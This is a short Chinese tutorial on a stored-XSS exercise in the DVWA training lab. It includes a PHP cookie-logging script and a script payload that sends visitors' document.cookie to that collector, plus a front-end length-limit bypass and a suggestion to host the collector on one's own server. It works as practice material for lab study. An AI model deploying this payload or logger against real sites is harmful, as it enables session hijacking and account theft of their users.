实战更能体验收获！！！

环境准备：

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件，内容如下：

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low)，(stored xss)那关，留言写入如下payload。

payload：<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制，简单直接前端改一下长度即可：

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下，会有一个cookie.txt文件，上面就会记录cookie及其IP

留言

实战结束留言：如果你拥有自己的网站以及服务器，本地实战就在你自己的服务器上实战即可，不过此处的IP地址也要跟着变化，不变化其实也行，但是改了更有实战的感觉，在此祝你们学习顺利！！！